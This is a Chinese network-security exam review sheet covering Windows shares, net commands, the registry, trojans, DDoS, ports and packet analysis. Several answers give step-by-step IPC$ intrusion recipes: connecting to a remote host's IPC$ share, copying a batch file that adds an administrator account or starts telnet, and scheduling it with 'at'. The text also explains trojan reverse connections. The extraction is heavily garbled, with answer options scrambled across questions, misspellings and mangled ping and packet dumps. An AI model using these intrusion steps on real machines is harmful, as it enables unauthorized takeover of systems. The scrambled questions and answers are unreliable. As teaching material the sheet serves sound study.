網(wǎng)絡安全技術復習題201116

1、1、卜列不是WINDOWS默認共享A、C$B、IPC$C、ADMIN$D WIN2、Sniffer 是A、掃描工具B、嗅探工具C、連接工具3、amdin$對應的目 錄是D、搜索工具（系統(tǒng)在D盤）。A、d: windowssystem32B、d: windowsC、d: program file4、建立賬號stu的命令是（密碼是D d:123）。A、net user 123 stu net user 123 stu /addC net use 123 stu /add net user stu 123 /add6、刪除amdin$的命令是5、創(chuàng)建d:sun共享的命令是A net sharesu=

2、d:sun/unlimitB net usesu=d: sun/unlimitc net usersu=d: sun/unlimitd net sharesu= sun/unlimitoA net share admin$B、net share admin$=c: windows /delC net share admin$ /delD net use admin$ /delB telnet7、windows有一個自帶的管理 telnet工具，該工具是C instsrvA tlntadmnD system328、要能夠進行遠程注冊表攻擊必須A、開啟目標機的service的服務B、開啟目標機的R

3、emote Registy Service 服務C、開啟目標機的Server服務D、開啟目標機的Remote Routig 服務9、widows操作系統(tǒng)和硬件信息存在在注冊表的A、HKEYCLASSESROOTB、HKEYCURRENTCONFIGC、HKEYCURRENT-USER D、HKEYLOCALMACHE10、木馬的最主要功能是 A、入侵B、遠程控制C、偽裝D、隱蔽11、灰鴿子是木馬。A、第代木馬B、第二代木馬C、第三代木馬D、第四代木馬12、冰河是_木馬。A、第一代B、第二代C、第三代D、第四代13、木馬是_軟件。A、遠程控制B、病毒軟件C、惡意軟件D、郵件14、木馬是米用_來控

4、制遠程機器的（c=Client s=Server ）。A、c控制sB、s控制cC、c控制cD、s控制s15、DDOS 是攻擊。溢出攻擊A、遠程攻擊B、分布式拒絕服務C、請求拒絕D、16、 amdin$對應的目錄是 （系統(tǒng)在D盤）。A、d: windowssystem32B、d: windowsC、d: program fileD、d:17、 建立共享成功的必要條件條件是 。A、開放server服務B、開放Task scheduler服務C、開啟Guest賬號D、開放遠程管理服務18、 net view命令查看的是 。A、所有共享B、特殊共享C、默認共享D、普通共享20、刪除賬號stu的命令是

5、（密碼是123）。A、net user 123 stuB、net user 123 stu /delC、net use 123 stu /delD、net user stu 123 /del21、 查看用戶信息的命令是 。A、 net useB、 net userC、net shareD、net userC、instsrv23、注冊表項數(shù)據(jù)長為A、REG-DWORDC、REG-BINARY22、windows有一個自帶的管理 telnet X具，該工具是 B、telnetA、tlntadmnD、system324個字節(jié)的是 類型。B、REG-EXPAND-SZD、REG-SZ24、 打開注冊表

6、的命令是 。A、 registry B、 regedit C、mmcD、 reg25、 注冊表文件的擴展名為 。A、batB、msC、regD、VBA、net startC、start telnet27、如果 telnet 00A、目標主機telnet服務沒開放C、目標主機telnet服務端口是25B、外網(wǎng)控制外網(wǎng)D、外網(wǎng)控制內網(wǎng)B、外網(wǎng)控制外網(wǎng)D、外網(wǎng)控制內網(wǎng)B、傳統(tǒng)連接D、反彈技術B、net share共享名=絕對目錄 /delD、net share 共享名 /del26、windows下啟動Telnet服務命令為B、net start telnetD、net st

7、art telnet service成功的話，則說明。B、目標主機的telnet服務停止D、目標主機的telnet服務端口是默認的28、木馬主動連接一定不能 A、內網(wǎng)控制外網(wǎng)C、內網(wǎng)控制內網(wǎng)29、木馬自動上線一定不能 A、內網(wǎng)控制外網(wǎng)C、內網(wǎng)控制內網(wǎng)30、第三代木馬使用 連接方式。A、主動連接C、正向連接31、刪除共享的一般格式是 。A、net share 共享名C、net use 共享名 /del32、 創(chuàng)建amdin$的命令是 。A、net user admin$C、net share admin$33、創(chuàng)建d:sun共享的命令是B、net share admin$=c: windowsD

8、、net use admin$A net sharesu=d:sun /unlimitB net usesu=d: sun /unlimitc net usersu=d: sun /unlimitd net sharesu= sun /unlimit35、緩沖區(qū)溢出A、只是系統(tǒng)層漏洞B、只是應用層漏洞C、既是系統(tǒng)層漏洞也是應用層漏洞D、只是TCP/IP漏洞37、斷開TELNET 連接的命令A、exitB、quitC、escD、ctr+q41、DDOS攻擊是利用 進行攻擊A、其他網(wǎng)絡B、通訊握手過程問題C、中間代理D、操作系統(tǒng)漏洞42、 黑客造成的主要安全隱患包括 。A、破壞系統(tǒng)、竊取信息及偽造

9、信息B、攻擊系統(tǒng)、獲取信息及假冒信息C、進入系統(tǒng)、損毀信息及謠傳信息D、通過內部系統(tǒng)進行攻擊43、計算機病毒是A、計算機程序B、數(shù)據(jù)C、臨時文件D、應用軟件 44、 以下關于 DOS攻擊的描述，哪句話是正確的？A、不需要侵入受攻擊的系統(tǒng)B、以竊取目標系統(tǒng)上的機密信息為目的C、導致目標系統(tǒng)無法處理正常用戶的請求D、如果目標系統(tǒng)沒有漏洞，遠程攻擊就不可能成功45、windows有一個自帶的管理 telnet工具，該工具是 A、tlntadmnB、telnetC、instsrvD、system321、 IPC$的中文名稱叫 命名管道2、 在本機用net查看用戶信息的命令是：net user.3、 映

10、射遠程主機 C盤為本機Z盤的完整命令是 net use z:c$4、 查看本機共享情況的命令是net share。5、查看遠程機器22 普通共享情況的完整命令是 net view22。6、 在遠程機器3 上把帳號stu加入administrators 組的net完整命令是 Net localgroup administrators stu /add。7、 NTLM勺認證方式包含 0、1和2三種，方式 表示先嘗試用ntlm認證，如失敗在用 用戶名和密碼。18、 注冊表中DWOR

11、數(shù)據(jù)類型的長度為 個字節(jié)。49、命令是打開注冊表。regedit10、 灰鴿子是 。遠程控制軟件（或木馬軟件）11、 在本機用net工具建立帳號 stu1完整命令是 stu1 123 /add（密碼是123）。 net user12、映射遠程主機 主機上 C盤為本機Z盤的完整命令是c$。net use13、 查看遠程主機 22的時間完整命令是22。net time14、 查看遠程機器22 所有共享情況的完整命令是22。net share15、建立IPC

12、$空連接的完整命令是（遠程主機是） net use" " /user: " " oIpc$16、在遠程機器3 上把帳號stu加入administrators 組的net完整命令是 netlocalgroup stu /add 。Administrators17、 DDO斂擊是利用中間代理進行攻擊，中間代理又叫 。肉雞18、命令是打開注冊表。regedit19、命令 打開微軟控制臺。 mmc20、彩衣的目的是 。逃避殺毒軟件的查殺21、 IPC$的中文名稱叫 。 ipc 進程間通信22、w

13、indows系統(tǒng)自帶的telnet服務可執(zhí)行文件的完整路徑是 。c:windowssystem32tlntsvr.exe23、 映射遠程主機 C 盤為本機Z盤的完整命令是 net usec$z:24、 在本機用net工具建立帳號 stu1完整命令是 stu1 123 /add（密碼是123）。 net user26、在遠程機器 3 上把帳號stu加入administrators 組的net完整命令是 net localgroup stu 。/add27、灰鴿子采用自動上線時，可以實現(xiàn)外網(wǎng)控制外網(wǎng)、內網(wǎng)控制內網(wǎng)和 。夕卜網(wǎng)控

14、制內網(wǎng)28、 跳板的含義是 。木馬攻擊的中間機器29、 DDO寶。分布式拒絕服務30、 查看遠程主機 22的時間完整命令是22。net time1、填寫下表，寫出下列服務的公認端口或功能描述TCPFTP21文件傳輸TELNET23遠程登錄服務HIIP80網(wǎng)貝瀏覽POP3110郵件服務協(xié)議SMTP25郵件傳送SOCKS108代理服務UDPRPC111遠程調用SMMP161簡單網(wǎng)絡管理TFTP69簡單文件傳輸2、寫出將D盤下student目錄共享的命令，共享名為stu。Net share stu=D: student /unlimited3、命令ne

15、t use z: c$成功執(zhí)行的結果是什么？該命令的成功執(zhí)行結果是在本地機器上多出一個盤符乙Z盤實質上就是遠程機器的C盤,在本地對Z盤的操作就等于對遠程機器C盤的操作。4、簡述NTLM的認證方式。NTLM認證方式有：0:不使用NTLM身份驗證。1:先嘗試NTLM身份驗證。如果失敗，再使用passwd。2:只使用NTLM身份驗證。5、簡述木馬攻擊的過程.答：配置生成服務端 種植木馬 上線，一般由主動和自動上線兩種 控制操作，實現(xiàn)攻擊者的意圖6、ping命令的結果一般根據(jù)網(wǎng)絡和目標機器不同，而不同，以下三個圖分別表示最常見的三種，請根據(jù)以下三圖回答問題：圖一Pinging

16、192_168.8.240 uith 32of data：Rfip lyKeplyReplyReplyfrom f rant from from1?2 »168.8.246： bytes=32192.1&8.8,240： bytes=32192 .1&8.8.240： bytes=32192-168.8.240: bytes=32t ine<lns tt ime<lmst ime<lnsTTL=127TTL=127TTL=127TTL-127Pinjf statistics f o> 192-1&S.S .240：Packets: Se

17、nt * 4, Received 4, Lost 0 <0x loss- rpproxinate round trip times in milli-seconds:Mininun = 6ns, Maxinun = Bn? Average = BnsPinging 192 -6S .45.12 irlth 32 hiltes o£ data ：Reijuest t inert out h Bequest timed out- Request lined out.Ping statistics £ or 2：Packets: Sent = 3, R

18、eceiued - 0, Lost = 3 <lU0z loss>,Pinsfingf 192 .168.8.240 with 32 btes of data：Dost inat ionDestinationDestinat ionDestinationhost hast host hostunreftchable.unreachable.unreachable.unreachable.圖三 、圖一表示ping的結果如何？ 、圖二最有可能是什么原因造成？ 、圖三的原因有哪些？答： 、圖一表示目標機暢通。 、圖二最有可能是不在線、關機或根本沒有這樣的機器。 、圖三的原因有硬件損壞或本

19、機沒有到達路由。7、用IPC$入侵方法在遠程主機上建立一個帳號為 STU2 ,并加入administrators過程 、net use ipc$ password" /user:"admin” 、建立文件 hacker.bat,其內容：net user s1 123 /addnet localgroup administrators stu /add 、copy hacker.bat c$ 、net time （取得時間 t） 、at t+3 c:hac

20、ker.bat8、簡述三次握手的過程: SYN=1ACK=O9、在本機用net user命令建立帳號：si,并加入administrator組的過程。 net user si 123 /addnet localgroup administrators si /add10、映射遠程主機 主機上C盤為本機Z:的命令。net use z: c$。11、 開啟遠程機器上telnet服務的方法。 建立ipc連接 連接管理遠程計算機即打開計算機管理操作連接到另一臺計算機 在服務欄下開啟telnet服務，同時可以更改啟動類型12、解釋反

21、彈技術答：設置中間代理 客戶端（控制端）向中間代理注冊本機的最新ip 客戶端開放監(jiān)聽端口，等待連接。 服務端從中間代理取得控制端的最新ip地址，并發(fā)出建立連接請求,戶端同意連接，成功建立連接13、利用bat遠程開啟telnet服務 、建立 ipc$連接，net use ipc$ "123” /user: " zhangsan” 、編寫bat文件tel.batnet start telnet 、copy tel.bat d$ 、net time （取得時間 t） 、at t+3

22、d:tel.bat注意：這種方法開啟的服務的啟動方式不能為禁止請對照相關協(xié)議14、 在校園的局域網(wǎng)中捕獲到一個以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示，的數(shù)據(jù)結構圖，回答以下問題：B«xt i niiti aiiFx*。七 owlInfo1J、1h一-aF -一JiBroacfcasTARPT*TT1T ET Ffl+. Frame 31 (6。 bytes on wire, 60 bytes caprLiredg Ethernet II, Src: intel_0e:b8:76 00:16:76:0E：bB:76), Dst: Broadcast (f:ff:ff:ff:ff) 

23、7; DEStinationi 日roadcast (ff:ff:ff:ff:ffiff)± ECLirce: lnTfil_0e:b8:76 fOO:16:76:Oe:b8:76)Type; arpTrdiler： 000000000000000000000000000000000000-Address Pesoluiion Protocol frequestHardware type: Ethernet COxOOOl)protocal type: IP 0XQ&QQ) Hardware size: 6 protoctjl size: 4Opcode: request C

24、OxOOOl)Sender MAC address: lnt&l_0e2 b8:76 (00il6:76:0eiba:76)Sender IP address : ID. 0. 26.12 C10. 0. 26.12)Target mac addlrass : 00 :0d：00_00 ;00;00 (00;00:00:00;00:00)Targettp address： 10,0.26.1 CLO.ClM)00000010002 0003 0f & Q G f o o o f ooo f ooo f Soo f ooo殲ff 04 00 0 00 Q0 00ff 00 01

25、00 ao Oa 00 QOICO ooo 09 0 olo 6 0 0 o o D 8 ao ooo 6&oo 7700 8 3 0 0 b b o o ooff o 6 6 a o 7710(1) 此幀的用途和目的是什么？地址解析協(xié)議的 ARP查詢。(2) 此幀的目的物理地址是ff:ff:ff:ff:ff:ff，它屬于(廣播、單播)地址。(3) 它的目的IP地址是，它屬于(廣播、單播)地址。(4) 此的源物理地址是00:16:76:0e:b8:76。(5) 它的源IP地址是 2，它屬于(公網(wǎng)、私網(wǎng))IP地址。(6) 此幀中封裝的上層協(xié)議是ARP協(xié)

26、議。15、下圖第四步傳輸什么內容：答：前三步是三次握手過程，第四步是請求的具體內容，比如網(wǎng)頁，前三步是為第四步服務的。16、 將當前目錄下 hancker.bat文件拷貝到遠程機器里C盤的命令是什么？ copy hacker.bat c$17、 在本機用net user命令建立帳號：s1,并加入administrator組的過程。 net user s1 123 /add net localgroup administrators s1 /add18、解釋反彈技術答：設置中間代理 客戶端（控制端）向中間代理注冊本機的最新ip 客戶端開放監(jiān)聽端口，

27、等待連接。 服務端從中間代理取得控制端的最新ip地址，并發(fā)出建立連接請求，客戶端同意連接，成功建立連接19、主動連接的過程.答：服務端開放監(jiān)聽端口，等待連接。 客戶端（控制端）發(fā)出建立連接請求 服務端同意連接，成功建立連接20、下圖是一臺計算機訪問一個 Web網(wǎng)站時SNIFFER獲取的數(shù)據(jù)包序列。分析圖中數(shù)據(jù)簡要回答以下問題：ourceDstinati onProtocol Infotup cus：與口十1：white > Ihttpac|=0 win=2 0. 282706202.203,203. 3203TCPhttp> ccs-softv/areSYN,ACK SeqO3 0.2828280320?* ?03r208* 32TCPccs-software > httpACK5eq-l Ack-14 0.2860160208. M2HTTPPOST/cgl-bln/loglnHTTP/L-1 (鄧pl25 Q, 5653852Q2.2Q3.208. M2犯.。門03tcphttp> ccs-sofrvvareACKSeq=l Adf6 3.66